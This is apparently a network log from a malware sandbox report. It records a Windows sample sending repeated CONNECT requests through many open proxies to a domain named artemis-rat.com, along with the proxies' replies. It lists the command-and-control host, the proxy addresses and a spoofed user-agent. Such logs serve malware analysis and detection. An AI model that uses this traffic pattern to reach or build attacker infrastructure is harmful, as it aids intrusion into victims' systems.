Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:47.905198097 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:50.998831034 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:57.092871904 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1527 | 192.168.2.5 | 54094 | 163.172.129.251 | 16379 | 3876 | C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:44.878737926 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:45.607986927 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:46.514638901 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:48.311554909 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:49.900506020 CET | 536 | IN | HTTP/1.0 501 Tor is not an HTTP Proxy
Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port asan HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, notan HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPortconfiguration option in place of, or in addition to, SOCKSPort.Please confi


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1528192.168.2.55369580.169.243.23410803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:44.934174061 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1529 | 192.168.2.5 | 49987 | 162.241.6.97 | 63360 | 3876 | C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:44.937077045 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:48.014290094 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1530 | 192.168.2.5 | 53719 | 194.4.50.60 | 12334 | 3876 | C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:44.939167023 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1531192.168.2.554105202.131.65.110803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:44.939169884 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:45.266884089 CET | 316 | IN | HTTP/1.1 400 Bad Request
Server: cloudflare
Date: Mon, 11 Mar 2024 02:30:45 GMT
Content-Type: text/html
Content-Length: 155
Connection: close
CF-RAY: -
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1532 | 192.168.2.5 | 49989 | 92.204.134.38 | 9375 | 3876 | C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:44.939554930 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1533192.168.2.552721153.19.91.77803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:44.940032005 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:48.092468977 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:51.202038050 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:17.931569099 CET804INHTTP/1.1 500 Internal Server Error
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:31:17 GMT
                                                                                                                                                                                                                                                            Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                                                                                                                            Content-Length: 612
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at ssc@gci.gdynia.pl to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><hr><address>Apache/2.4.52 (Ubuntu) Server at artemis-rat.com Port 443</address></body></html>
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:52.469439030 CET804INHTTP/1.1 500 Internal Server Error
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:31:17 GMT
                                                                                                                                                                                                                                                            Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                                                                                                                            Content-Length: 612
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at ssc@gci.gdynia.pl to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><hr><address>Apache/2.4.52 (Ubuntu) Server at artemis-rat.com Port 443</address></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1534192.168.2.549952176.241.143.19780803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.941252947 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.092458010 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.202019930 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:52.109069109 CET19INHTTP/1.1 200 OK


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1535192.168.2.554155172.67.181.197803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.961136103 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.115636110 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:45 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1536192.168.2.553635149.34.210.6290903876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.970967054 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.092662096 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1537192.168.2.554123154.12.178.107299853876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.990813017 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1538192.168.2.553731161.97.147.193196553876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.002625942 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.014503002 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.108208895 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:57.217164993 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1539192.168.2.554221188.114.99.171803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            Timestamp  Bytes transferred  Direction  Data
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.008536100 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.164302111 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:45 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1540192.168.2.550107183.96.235.105185723876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            Timestamp  Bytes transferred  Direction  Data
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.012247086 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.092664003 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.202053070 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:57.201961994 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1541192.168.2.55415038.54.6.3990803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            Timestamp  Bytes transferred  Direction  Data
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.015697956 CET  193  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.243484020 CET39INHTTP/1.1 200 Connection established


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1542192.168.2.553365206.220.175.241453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            Timestamp  Bytes transferred  Direction  Data
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.019180059 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1543192.168.2.55414341.231.37.7631283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            Timestamp  Bytes transferred  Direction  Data
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.020776987 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.528063059 CET39INHTTP/1.1 200 Connection established


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1544192.168.2.554117103.216.49.15180803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            Timestamp  Bytes transferred  Direction  Data
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.028364897 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.386403084 CET340INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: nginx/1.12.2
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:44 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Content-Length: 173
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.2</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1545192.168.2.553879184.170.245.14841453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            Timestamp  Bytes transferred  Direction  Data
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.030430079 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1546192.168.2.554275172.67.3.108803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            Timestamp  Bytes transferred  Direction  Data
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.030459881 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.185097933 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:45 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                                            1547192.168.2.554144119.3.215.4188883876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:45.032833099 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                                            1548192.168.2.550012154.0.14.11631283876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:45.071146965 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:49.145448923 CET | 39 | IN | HTTP/1.1 200 Connection established


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                                            1549192.168.2.55421938.162.12.8231283876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:45.072016954 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:47.516192913 CET | 111 | IN | HTTP/1.1 407 Proxy Authentication Required
                                                                                                                                                                                                                                                            Proxy-Authenticate: Basic realm=""
                                                                                                                                                                                                                                                            Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
                                                                                                                                                                                                                                                            Data Ascii: Proxy Authentication Required


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                                            1550192.168.2.55379046.29.116.341453876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:45.072019100 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                                            1551192.168.2.554113102.132.201.202803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:45.076698065 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


